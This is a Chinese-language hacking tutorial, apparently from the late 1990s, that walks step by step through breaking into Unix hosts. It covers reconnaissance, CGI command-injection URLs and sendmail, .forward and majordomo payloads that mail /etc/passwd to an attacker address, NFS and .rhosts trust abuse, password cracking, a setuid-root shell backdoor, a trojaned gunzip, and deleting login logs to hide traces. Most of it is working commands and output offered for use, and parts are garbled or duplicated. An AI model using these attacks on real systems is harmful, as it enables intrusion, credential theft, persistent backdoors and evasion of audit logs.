[摘要] ***一个系统有很多步骤,阶段性很强的“工作”,其最终的目标是获得超级用户权限——对目标系统的绝对控制。从对该系统一无所知开始,我们利用其提供的各种网络服务收集关于它的信息,这些信息暴露出系统的安全脆弱性或潜在入口;然后我们利用这些网络服务固有的或配置上的漏洞,试图从目标系统上取回重要信息(如口令文件)、或在上面执行命令,通过这些办法,我们有可能在该系统上获得一个普通的shell接口;接下来,我们再利用目标系统本地的操作系统或应用程序的漏洞试图提升我们在该系统上的权限,攫取超级用户控制;适当的善后工作包括隐藏身份、消除痕迹、安置特洛伊***和留后门。
(零)、确定目标
1) 目标明确--那就不用废话了
2) 抓网:从一个有很多链接的WWW站点开始,顺藤摸瓜;
3) 区段搜索:如用samsa开发的mping(multi-ping);
4) 到网上去找站点列表;
(一)、 白手起家(情报搜集)
从一无所知开始:
1) tcp_scan,udp_scan
# tcp_scan numen 1-65535
7:echo:
7:echo:
9:discard:
13:daytime:
19:chargen:
21:ftp:
23:telnet:
25:smtp:
37:time:
79:finger
111:sunrpc:
512:exec:
513:login:
514:shell:
515:printer:
540:uucp:
2049:nfsd:
4045:lockd:
6000:xwindow:
6112:dtspc:
7100:fs:
…
# udp_scan numen 1-65535
7:echo:
7:echo:
9:discard:
13:daytime:
19:chargen:
37:time:
42:name:
69:tftp:
111:sunrpc:
161:UNKNOWN:
177:UNKNOWN:
...
看什么:
1.1)可疑服务: finger,sunrpc,nfs,nis(yp),tftp,etc..
1.2)系统入口: ftp,telnet,http, shell(rsh), login (rlogin),smtp,exec(rexec)
(samsa: [/etc/inetd.conf]最要紧!!)
2) finger
# finger root@numen
[numen]
Login Name TTY Idle When Where
root Super-User console 1 Fri 10:03 :0
root Super-User pts/6 6 Fri 12:56 192.168.0.116
root Super-User pts/7 Fri 10:11 zw
root Super-User pts/8 1 Fri 10:04 :0.0
root Super-User pts/1 4 Fri 10:08 :0.0
root Super-User pts/11 3:16 Fri 09:53 192.168.0.114
root Super-User pts/10 Fri 13:08 192.168.0.116
root Super-User pts/12 1 Fri 10:13 :0.0
(samsa: root 这么多,不容易被发现哦~)
# finger ylx@numen
[victim.com]
Login Name TTY Idle When Where
ylx ??? pts/9 192.168.0.79
# finger @numen
[numen]
Login Name TTY Idle When Where
root Super-User console 7 Fri 10:03 :0
root Super-User pts/6 11 Fri 12:56 192.168.0.116
root Super-User pts/7 Fri 10:11 zw
root Super-User pts/11 3:21 Fri 09:53 192.16 numen:
root Super-User pts/11 3:21 Fri 09:53 192.16 numen:
ts/10 May 7 13:08 18 (192.168.0.116)
(samsa:如果没有finger,就只好有rusers乐)
4) showmount
# showmount -ae numen
export table of numen:
/space/users/lpf sun9
samsa:/space/users/lpf
sun9:/space/users/lpf
(samsa:该机提供了那些共享目录,谁共享了这些目录[/etc/dfs/dfstab])
5) rpcinfo
# rpcinfo -p numen
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100024 1 udp 32772 status
100024 1 tcp 32771 status
100021 4 udp 4045 nlockmgr
100001 2 udp 32778 rstatd
100083 1 tcp 32773 ttdbserver
100235 1 tcp 32775
100021 2 tcp 4045 nlockmgr
100005 1 udp 32781 mountd
100005 1 tcp 32776 mountd
100003 2 udp 2049 nfs
100011 1 udp 32822 rquotad
100002 2 udp 32823 rusersd
100002 3 tcp 33180 rusersd
100012 1 udp 32824 sprayd
100008 1 udp 32825 walld
100068 2 udp 32829 cmsd
(samsa:[/etc/rpc]可惜没开rexd,据说开了rexd就跟没password一样哦!
不过有rstat,rusers,mount和nfs:-)
6) x-windows
# DISPLAY=victim.com:0.0
# export DISPLAY
# export DISPLAY
# xhost
access control disabled, clients can connect from any host
(samsa:great!!!)
# xwininfo -root
xwininfo: Window id: 0x25 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1152
Height: 900
Depth: 24
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x21 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1152x900+0+0
(samsa:can't be greater!!!!!!!!!!!)
7) smtp
# telnet numen smtp
Trying 192.168.0.198...
Connected to numen.
Escape character is '^]'.
220 numen.ac.cn ESMTP Sendmail 8.9.1b+Sun/8.9.1; Fri, 7 May 1999 14:01:39 +0800
(CST)
expn root
250 Super-User <">[email]root@numen.ac.cn[/email]>
vrfy ylx
250 <">[email]ylx@numen.ac.cn[/email]>
expn ftp
expn ftp
250 <">[email]ftp@numen.ac.cn[/email]>
(samsa:ftp说明有匿名ftp)
(samsa:如果没有finger和rusers,只好用这种方法一个个猜用户名乐)
debug
500 Command unrecognized: "debug"
wiz
500 Command unrecognized: "wiz"
(samsa:这些著名的漏洞现在哪儿还会有呢?:-(()
8) 使用 scanner(***)
# satan victim.com
...
(samsa:satan 是图形界面的,就没法陈列了!!
列举出 victim.com 的系统类型(e.g.SunOS 5.7),提供的服务(e.g.WWW)和存在的脆弱性)
二、隔山打牛(远程***)
1) 隔空取物:取得passwd
1.1) tftp
# tftp numen
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit
(samsa:一无所获,但是...)
# tftp sun8
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation
(samsa:成功了!!!;-)
# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh
(samsa:可惜是shadow过了的:-/)
1.2) 匿名ftp
1.2.1) 直接获得
# ftp sun8
Connected to sun8.
220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
Name (sun8:root): anonymous
331 Guest login ok, send ident as password.
Password:
(samsa:your e-mail address,当然,是假的:->)
230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
bin
dev
etc
incoming
pub
usr
226 ASCII Transfer complete.
35 bytes received in 0.85 seconds (0.04 Kbytes/s)
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
group
passwd
226 ASCII Transfer complete.
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
231 bytes received in 0.038 seconds (5.98 Kbytes/s)
# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false
(samsa:正常!把完整的 passwd 放在匿名ftp目录下的笨蛋太少了)
1.2.2) ftp 主目录可写
# cat forward_sucker_file
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email]me@my.e-mail.addr[/email]"
# ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:[your e-mail address:forged]
230 Guest login ok, access restrictions apply.
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
# echo test | mail [email]ftp@victim.com[/email]
(samsa:等着passwd文件随邮件来到吧...)
1.3) WWW
著名的cgi大bug
1.3.1) phf
[url]http://silly.com/cgi-bin/nph-test-cgi?[/url]*
[url]http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd[/url]
1.3.2) campus
[url]http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd[/url]
%0a/bin/cat%0a/etc/passwd
1.3.3) glimpse
[url]http://silly.com/cgi-bin/aglimpse/80[/url]|IFS=5;CMD=5mail5me:@my.e-mail.
addr
(samsa:行太长,折了折,不要紧吧? ;-)
1.4) nfs
1.4.1) 如果把/etc共享出来,就不必说了
1.4.2) 如果某用户的主目录共享出来
# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.forward
$ cat >.forward
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email]me@my.e-mail.addr[/email]"
^D
# echo test | mail zw@numen
(samsa:等着你的邮件吧....)
1.5) sniffer
利用ethernet的广播性质,偷听网络上经过的IP包,从而获得口令。
关于sniffer的原理和技术细节,见[samsa 1999].
(samsa:没什么意思,有种``胜之不武''的感觉...)
1.6) NIS
1.6.1) 猜测域名,然后用ypcat(或对于NIS+:niscat)可获得passwd(甚至shadow)
1.6.2) 若能控制NIS服务器,可创建邮件别名
nis-master # echo 'foo: "| mail [email]me@my.e-mail.addr[/email] < /etc/passwd "' >> /etc/alias
s
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v [email]foo@victim.com[/email]
1.7) e-mail
e.g.利用majordomo(ver. 1.94.3)的漏洞
Reply-to: a~.`/usr/bin/rcp${IFS}[email]me@hacker.home.edu[/email]:script${IFS}/tmp
/script;;source${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\@his.e-mail
# cat script
/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email]me@my.e-mail.addr[/email]
#
1.8) sendmail
利用sendmail 5.55的漏洞:
# telnet victim.com 25
Trying xxx.xxx.xxx.xxx...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail [email]me@my.e-mail.addr[/email] < /etc/passwd"
250 "|/bin/mail [email]me@my.e-mail.addr[/email] < /etc/passwd"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
..
250 Mail accepted
quit
Connection closed by foreign host.
(samsa:wait...)
2) 远程控制
2.1) DoS***
2.1.1) Syn-flooding
向目标发起大量TCP连接请求,但不按TCP协议规定完成正常的3次握手,导致目标系统等待# 耗费其
网络资源,从而导致其网络服务不可用。
2.1.2) Ping-flooding
向目标系统发大量ping包,i.e.ICMP_ECHO包,使目标的网络接口应接不暇 ?被尽?
2.1.3) Udp-stroming
类似2.1.2)发大量udp包。
2.1.4) E-mail bombing
发大量e-mail到对方邮箱,使其没有剩余容量接收正常邮件。
2.1.5) Nuking
向目标系统某端口发送一点特定数据,使之崩溃。
2.1.6) Hi-jacking
冒充特定网络连接之一放向网络上发送特定包(FIN或RST),以中止特定网络连接;
2.2) WWW(远程执行)
2.2.1) phf CGI
2.2.3) campus CGI
2.2.4) glimpse CGI
(samsa:在网上看见NT下也有一个叫websn.exe的buggy CGI,详情不清楚)
2.3) e-mail
同1.7,利用majordomo(ver. 1.94.3)的漏洞
2.4) sunrpc:rexd
据说如果rexd开放,且rpcbind不是secure方式,就相当于没有口令,可以任意远程
运行目标机器上的过?
2.5) x-windows
如果xhost的access control is disabled,就可以远程控制这台机器的显示系统,在
上面任意显示,还可以偷窃键盘输入和显示内容,甚至可以远程执行...
三、登堂入室(远程登录)
1) telnet
要点是取得用户帐号和保密字
1.1) 取得用户帐号
1.1.1) 使用“白手起家”中介绍的方法
1.1.2) 其他方法:e.g.根据从那个站点寄出的e-mail地址
1.2) 获取口令
1.2.1) 口令破解
1.2.1.1) 使用“隔空取物”中介绍的方法取得/etc/passwd和/etc/shadow
1.2.1.2) 使用口令破解程序破解口令
e.g.使用john the riper:
# unshadow passwd shadow > pswd.1
# pwd_crack -single pswd.1
# pwd_crack -wordfile:/usr/dict/words -rules pswd.1
# pwd_crack -i:alph5 pswd.1
1.2.1.3) 使用samsa开发的适合中国人的字典生成程序
# dicgen 1 words1 /* 所有1音节的汉语拼音 */
# dicgen 2 words2 /* 所有2音节的汉语拼音 */
# dicgen 3 words3 /* 所有3音节的汉语拼音 */
# pwd_crack -wordfile:words1 -rules pswd.1
# pwd_crack -wordfile:words2 -rules pswd.1
# pwd_crack -wordfile:words3 -rules pswd.1
1.2.2) 蛮干(brute force):猜测口令
猜法:与用户名相同的口令,用户名的简单变体,机构名,机器型号etc
e.g. cxl: cxl,cxl111,cxl123,cxl12345,cxlsun,ultra30 etc...
(samsa:如果用户数足够多,这种方法还是很有效的:需要运气和灵感)
2) r-命令:rlogin,rsh
关键在信任关系,即:/etc/hosts.equiv,~/.rhosts文件
2.1) /etc/hosts.equiv
如果/etc/hosts.equiv文件中有一个"+",那么任何一台主机上的任何一个用户(root除
外),可以远程登录而不需要口令,并成为该机上同名用户;
2.2) ~/.rhosts
如果某用户主目录(home directory)下.rhosts文件中有一个"+",那么任何一台主机上
的同名用户可以远程登录而不需要口令
2.3) 改写这两个文件
2.3.1) nfs
如果某用户的主目录共享出来
# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.rhosts
+
^D
$ rsh numen csh -i
Warning: no access to tty; thus no job control in this shell...
numen%
2.3.2) smtp
利用``decode''别名
a) 若任一用户主目录(e.g./home/zen)或其下.rhosts对daemon可写,则
# echo "+" | uuencode /home/zen/.rhosts | mail [email]decode@victim.com[/email]
(samsa:于是/home/zem/.rhosts中就出现一个"+")
b) 无用户主目录或其下.rhosts对daemon可写,则利用/etc/aliases.pag,
因为许多系统中该文件是world-writable.
# cat decode
bin: "| cat /etc/passwd | mail [email]me@my.e-mail.addr[/email]"
# newaliases -oQ/tmp -oA`pwd`/decode
# uuencode decode.pag /etc/aliases.pag | mail [email]decode@victom.com[/email]
# /usr/lib/sendmail -fbin -om -oi [email]bin@victim.com[/email] < /dev/null
(samsa:wait .....)
c) sendmail 5.59 以前的bug
# cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
..
rcpt to: /home/zen/.rhosts
mail from: zen
data
+
+
..
quit
EOSM
# /bin/sh evil_sendmail
Trying xxx.xxx.xxx.xxx
Connected to victim.com
Escape character is '^]'.
Connection closed by foreign host.
# rlogin victim.com -l zen
Welcome to victim.com!
$
d) sendmail 的一个较`新'bug
# telnet victim.com 25
Trying xxx.xxx.xxx.xxx...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|echo + >> /home/zen/.rhosts"
250 "|echo + >> /home/zen/.rhosts"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
..
250 Mail accepted
quit
Connection closed by foreign host.
# rsh victim.com -l zen csh -i
Welcome to victim.com!
$
2.3.3) IP-spoofing
r-命令的信任关系建立在IP上,所以通过IP-spoofing可以获得信任;
3) rexec
类似于telnet,也必须拿到用户名和口令
4) ftp 的古老bug
# ftp -n
ftp> open victim.com
Connected to victim.com
ected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)
(samsa:你已经是root了)
四、溜门撬锁
一旦在目标机上获得一个(普通用户)shell,能做的事情就多了
1) /etc/passwd , /etc/shadow
能看则看,能取则取,能破则破
1.1) 直接(no NIS)
$ cat /etc/passwd
......
......
1.2) NIS(yp:yellow page)
$ domainname
cas.ac.cn
$ ypwhich -d cas.ac.cn
$ ypcat passwd
1.3) NIS+
ox% domainname
ios.ac.cn
ox% nisls
ios.ac.cn:
org_dir
groups_dir
ox% nisls org_dir
org_dir.ios.ac.cn.:
passwd
group
auto_master
auto_home
auto_home
bootparams
cred
ethers
hosts
mail_aliases
sendmailvars
netmasks
netgroup
networks
protocols
rpc
services
timezone
ox% niscat passwd.org_dir
root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
daemon:NP:1:1::/::6445::::::
bin:NP:2:2::/usr/bin::6445::::::
sys:NP:3:3::/::6445::::::
adm:NP:4:4:Admin:/var/adm::6445::::::
lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
smtp:NP:0:0:Mail Daemon User:/::6445::::::
uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
nobody:NP:60001:60001:Nobody:/::6445::::::
noaccess:NP:60002:60002:No Access User:/::6445::::::
guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
....
(samsa:gotcha!!!)
2) 寻找系统漏洞
2.0) 搜集信息
ox% uname -a
SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
ox% id
uid=820(ywc) gid=800(ofc)
ox% hostname
ox
ox
ox% domainname
ios.ac.cn
ox% ifconfig -a
lo0: flags=849 mtu 8232
inet 127.0.0.1 netmask ff000000
be0: flags=863 mtu 1500
inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
ipd0: flags=c0 mtu 8232
inet 0.0.0.0 netmask 0
ox% netstat -rn
Routing Table:
Destination Gateway Flags Ref Use Interface
-------------------- -------------------- ----- ----- ------ ---------
127.0.0.1 127.0.0.1 UH 0 738 lo0
159.226.5.128 159.226.5.188 U 3 341 be0
224.0.0.0 159.226.5.188 U 3 0 be0
default 159.226.5.189 UG 0 1198
......
2.1) 寻找可写文件、目录
ox% cd /tmp
ox% cd /tmp
ox% mkdir .hide
ox% cd .hide
ox% ls -ld `find / ( ( -type d -o -type f ) -a ( -perm -0002 -o -group 800
-a -perm -0020 ) ) -print` >.wr
(samsa:wr=writables:可写目录、文件)
ox% grep '^d' .wr > .wd
(samsa:wd=writable directories:目录)
ox% grep '^-' .wr > .wf
(samsa:wf=writable files:普通文件)
ox% ls -l `find / ( -perm -4000 -a -user root ) -print` >.sr
(samsa:sr=suid roots)
2.1.1) 系统配置文件可写:e.g.pam.conf,inetd.conf,inittab,passwd,etc.
2.1.2) bin 目录可写:e.g./usr/bin,/usr/local/bin,etc. (see:Trojan horses)
2.1.3) log 文件可写:e.g./var/adm/wtmp,/var/adm/messges,etc.(for track-erasing)
2.2) 篡改主页
绝大多数系统 http 根目录下权限设置有误!不信请看:
ox1% grep http /etc/inetd.conf
ox1% ps -ef | grep http
http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/httpd -
f /opt/home1/ofc/http/httpd/conf/httpd.conf
http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/httpd -
f /opt/home1/ofc/http/httpd/conf/httpd.conf
root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/httpd -
f /opt/home1/ofc/http/httpd/conf/httpd.conf
......
ox1% cd /opt/home1/ofc/http/httpd
ox1% ls -l |more
total 530
drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
-rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 p_w_picpaths
-rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research
(samsa:哈哈!!差不多全都可以写,太牛了,改吧,还等什么??)
3) 拒绝服务(DoS:Denial of Service)
利用系统漏洞捣乱
e.g. Solaris 2.5(2.5.1)下:
$ ping -sv -i 127.0.0.1 224.0.0.1
PING 224.0.0.1 56 data bytes
(samsa:于是机器就reboot乐,荷荷)
六、最后的疯狂(善后)
1) 后门
e.g.有一次,俺通过改写/.rhosts成了root,但.rhosts很容易被发现的哦,怎么
办?留个后门的说:
# rm -f /.rhosts
# cd /usr/bin
# ls mscl
# ls mscl
mscl: 无此文件或目录
# cp /bin/ksh mscl
# chmod a+s mscl
# ls -l mscl
-r-sr-sr-x 1 root ofc 192764 5月 19 11:42 mscl
以后以任何用户登录,只要执行``/usr/bin/mscl''就成root了。
/usr/bin下面那一大堆程序,能发现这个mscl的几率简直小到可以忽略不计了。
2) 特洛伊***
e.g. 有一次我发现:
$ echo $PATH
/usr/sbin:/usr/bin:/usr/ccs/bin:/opt/gnu/bin:.
$ ls -ld /opt/gnu
drwxrwxrwx 7 root other 512 5月 14 11:54 /opt/gnu
$ cd /opt/gnu
$ ls -l
total 24
drwxrwxrwx 7 root other 512 5月 14 11:54 .
drwxrwxr-x 9 root sys 512 5月 19 15:37 ..
drwxr-xr-x 2 root other 1536 5月 14 16:10 bin
drwxr-xr-x 3 root other 512 1996 11月 29 include
drwxr-xr-x 2 root other 3584 1996 11月 29 info
drwxr-xr-x 4 root other 512 1997 12月 17 lib
$ cp -R bin .TT_RT; cd .TT_RT
``.TT_RT''这种东东看起来象是系统的...
决定替换常用的程序gunzip
$ mv gunzip gunzip:
$ cat > toxan
#!/bin/sh
echo "+ +" >/.rhosts
^D
$ cat > gunzip
if [ -f /.rhosts ]
then
mv /opt/gnu/bin /opt/gnu/.TT_RT
mv /opt/gnu/.TT_DB /opt/gnu/bin
/opt/gnu/bin/gunzip $*
else
/opt/gnu/bin/gunzip: $*
fi
fi
^D
$ chmod 755 toxan gunzip
$ cd ..
$ mv bin .TT_DB
$ mv .TT_RT bin
$ ls -l
total 16
drwxr-xr-x 2 zw staff 1536 5月 14 16:10 bin
drwxr-xr-x 3 root other 512 1996 11月 29 include
drwxr-xr-x 2 root other 3584 1996 11月 29 info
drwxr-xr-x 4 root other 512 1997 12月 17 lib
$ ls -al
total 24
drwxrwxrwx 7 root other 512 5月 14 11:54 .
drwxrwxr-x 9 root sys 512 5月 19 15:37 ..
drwxr-xr-x 2 root other 1536 1998 11月 2 .TT_DB
drwxr-xr-x 2 zw staff 1536 5月 14 16:10 bin
drwxr-xr-x 3 root other 512 1996 11月 29 include
drwxr-xr-x 2 root other 3584 1996 11月 29 info
drwxr-xr-x 4 root other 512 1997 12月 17 lib
虽然有点暴露的可能(bin的属主竟然是zw!!!),但也顾不得了。
盼着root尽快执行gunzip吧...
过了两天:
$ cd /opt/gnu
$ ls -al
total 24
drwxrwxrwx 7 root other 512 5月 14 11:54 .
drwxrwxr-x 9 root sys 512 5月 19 15:37 ..
drwxr-xr-x 2 zw other 1536 1998 11月 2 .TT_RT
drwxr-xr-x 2 root staff 1536 5月 14 16:10 bin
drwxr-xr-x 3 root other 512 1996 11月 29 include
drwxr-xr-x 2 root other 3584 1996 11月 29 info
drwxr-xr-x 4 root other 512 1997 12月 17 lib
(samsa:bingo!!!有人运行俺的特洛伊***乐...)
$ ls -a /
(null) .exrc dev proc
.. .fm devices reconfigure
.. .hotjava etc sbin
..Xauthority .netscape export tftpboot
..Xdefaults .profile home tmp
..Xdefaults .profile home tmp
..Xlocale .rhosts kernel usr
..ab_library .wastebasket lib var
......
$ cat /.rhosts
+ +
$
(samsa:下面就不用 罗嗦了吧?)
注:该结果为samsa杜撰,那个特洛伊***至今还在老地方静悄悄地呆着呢,即无人发
现也没人光顾!!——已经20多年过去了耶....
3) 毁尸灭迹
消除掉登录记录:
3.1) /var/adm/lastlog
# cd /var/adm
# ls -l
总数73258
-rw------- 1 uucp bin 0 1998 10月 9 aculog
-r--r--r-- 1 root root 28168 5月 19 16:39 lastlog
drwxrwxr-x 2 adm adm 512 1998 10月 9 log
-rw-r--r-- 1 root root 30171962 5月 19 16:40 messages
drwxrwxr-x 2 adm adm 512 1998 10月 9 passwd
-rw-rw-rw- 1 bin bin 0 1998 10月 9 spellhist
-rw------- 1 root root 6871 5月 19 16:39 sulog
-rw-r--r-- 1 root bin 1188 5月 19 16:39 utmp
-rw-r--r-- 1 root bin 12276 5月 19 16:39 utmpx
-rw-rw-rw- 1 root root 122 1998 10月 9 vold.log
-rw-rw-r-- 1 adm adm 3343551 5月 19 16:39 wtmp
-rw-rw-r-- 1 adm adm 7229076 5月 19 16:39 wtmpx
为了下次登录时不显示``Last Login''信息(向真正的用户显示):
# rm -f lastlog
# telnet victim.com
SunOS 5.7
login: zw
Password:
Sun Microsystems Inc. SunOS 5.7 Generic October 1998
$
(比较:
(比较:
SunOS 5.7
login: zw
Password:
Last login: Wed May 19 16:38:31 from zw
Sun Microsystems Inc. SunOS 5.7 Generic October 1998
$
说明:/var/adm/lastlog 每次有用户成功登录进来时记一条,所以删掉以后再
登录一次就没有``Last Login''信息,但再登一次又会出现,因为系统会自动
重新创建该文件)
3.2) /var/adm/utmp,/var/adm/utmpx /var/adm/wtmp,/var/adm/wtmpx
utmp、utmpx 这两个数据库文件存放当前登录在本机上的用户信息,用于who、
write、login等程序中;
$ who
wsj console 5月 19 16:49 (:0)
zw pts/5 5月 19 16:53 (zw)
yxun pts/3 5月 19 17:01 (192.168.0.115)
wtmp、wtmpx分别是它们的历史记录,用于``last''
命令,该命令读取wtmp(x)的内容并以可理解的方式进行显示:
$ last | grep zw
zw ftp 192.168.0.139 Fri Apr 30 09:47 - 10:12 (00:24)
zw pts/1 192.168.0.139 Fri Apr 30 08:05 - 11:40 (03:35)
zw pts/18 192.168.0.139 Thu Apr 29 15:36 - 16:50 (01:13)
zw pts/7 Thu Apr 29 09:53 - 15:35 (05:42)
zw pts/7 192.168.0.139 Thu Apr 29 08:48 - 09:53 (01:05)
zw ftp 192.168.0.139 Thu Apr 29 08:40 - 08:45 (00:04)
zw pts/10 192.168.0.139 Thu Apr 29 08:37 - 13:27 (04:49)
......
utmp、wtmp已经过时,现在实际使用的是utmpx和wtmpx,但同样的信息依然以旧的
格式记录在utmp和wtmp中,所以要删就全删。
# rm -f wtmp wtmpx
# last
/var/adm/wtmpx: 无此文件或目录
3.3) syslog
syslogd 随时从系统各处接受log请求,然后根据/etc/syslog.conf中的预先设定把
log信息写入相应文件中、邮寄给特定用户或者直接以消息的方式发往控制台。
始母?囟ㄓ没Щ蛘咧苯右韵?⒌姆绞椒⑼?刂铺ā?
不妨先看看syslog.conf的内容:
---------------------- begin: syslog.conf -------------------------------
#ident "@(#)syslog.conf 1.4 96/10/11 SMI" /* SunOS 5.0 */
#
# Copyright (c) 1991-1993, by Sun Microsystems, Inc.
#
# syslog configuration file.
#
*.err;kern.notice;auth.notice /dev/console
*.err;kern.debug;daemon.notice;mail.crit /var/adm/messages
*.alert;kern.err;daemon.err operator
*.alert root
......
---------------------- end : syslog.conf -------------------------------
``auth.notice''这样的东东由两部分组成,称为``facility.level'',前者表示log
信息涉及的方面,level表示信息的紧急程度。
facility 有:user,kern,mail,daemon,auth,lpr,news,uucp,cron,etc...
level 有:emerg,alert,crit,err,warning,info,debug,etc...(紧急程度递减)
一般和安全关系密切的facility是mail,daemon,auth etc...
,daemon,auth etc...
而这类信息按惯例通常存放在/var/adm/messages里。
那么 messages 里那些信息容易暴露“***”痕迹呢?
1,"May 4 08:48:35 numen login: REPEATED LOGIN FAILURES ON /dev/pts/9 FROM sams
"
重复登录失败!如果你猜测口令的话,你肯定会经历很多次这样的失败!
不过一般的UNIX系统只有一次telnet session连续登录5次失败才会记这么一条,所以
当你4次尝试还没成功,最好赶紧退出,重新telnet...
2,"May 5 10:30:35 numen su: 'su root' failed for cxl on /dev/pts/15"
"May 18 17:02:16 numen su: 'su root' succeeded for zw on /dev/pts/1"
如果***想利用``su''成为超级用户,无论成功失败,messages里都可能有记录...
3,"Apr 29 10:12:23 numen sendmail[4777]: NOQUEUE: "wiz" command from numen"
"Apr 29 10:12:23 numen sendmail[4777]: NOQUEUE: "debug" command from numen"
